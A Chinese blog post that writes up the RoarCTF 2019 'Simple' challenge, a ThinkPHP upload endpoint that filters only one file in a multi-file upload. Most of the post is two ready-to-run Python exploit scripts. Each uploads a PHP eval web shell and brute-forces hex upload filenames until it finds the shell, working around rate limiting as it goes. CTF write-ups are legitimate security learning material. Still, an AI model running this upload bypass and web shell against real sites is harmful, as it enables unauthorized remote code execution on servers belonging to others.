美文网首页
2019-12-04 [RoarCTF 2019]Simple

2019-12-04 [RoarCTF 2019]Simple

作者: KanoWill | 来源:发表于2019-12-04 15:58 被阅读0次

    首先确认入口点把我折腾了好一会儿,最后才明白是单模块的ThinkPHP,入口点为/index.php/home/index/upload
    经过分析,发现是多文件上传,过滤处理仅处理了一个文件,可以同时上传多个文件直接解出题目,其它文件我们可以用暴力的方法推断出文件路径,具体解题脚本如下
    python3(未确认正确性):

    import requests
    import time
    import json
    
    url = "http://33553ba3-3ecf-4551-af99-378c3c2504a6.node3.buuoj.cn"
    
    path = url + "/index.php/home/index/upload"
    files = {"file":("a.txt",'a'), "file1":("b.php", '<?php eval($_GET["a"]);')}
    r = requests.post(path, files=files)
    t1 = r.text.split("/")[-1].split(".")[0]
    param=json.loads(r.content)
    print(param)
    t1 = int(t1, 16)
    
    j = t1
    while True:
        path = url + "/Public/Uploads/"+param['url'].split("/")[-2]+"/%s.php" % hex(j)[2:]
        try:
            r = requests.get(path,timeout=1)
        except:
            continue
        if r.status_code == 429:#规避过于频繁访问导致的429
            time.sleep(0.1)
            continue
        elif r.status_code != 404:
            print(path)
            print(r.text)
            break
        print(j, path, r.status_code)
        j -= 1
    

    python2(用这个拿的flag):

    import requests
    import time
    import json
    
    url = "http://443e6467-a00e-47ec-b8cb-6af3da800131.node3.buuoj.cn/"
    
    path = url + "/index.php/home/index/upload"
    files = {"file":("a.txt",'a'), "file1":("b.php", '<?php eval($_GET["a"]);')}
    r = requests.post(path, files=files)
    t1 = r.text.split("/")[-1].split(".")[0]
    param=json.loads(r.content)
    print param
    t1 = int(t1, 16)
    
    j = t1
    while True:
        path = url + "/Public/Uploads/"+param['url'].split("/")[-2]+"/%s.php" % hex(j)[2:]
        try:
            r = requests.get(path,timeout=1)
        except:
            continue
        if r.status_code == 429:#规避过于频繁访问导致的429
            time.sleep(0.1)
            continue
        elif r.status_code != 404:
            print path
            print r.text
            break
        print j, path, r.status_code
        j -= 1
    

    相关文章

      网友评论

          本文标题:2019-12-04 [RoarCTF 2019]Simple

          本文链接:https://www.haomeiwen.com/subject/qadlgctx.html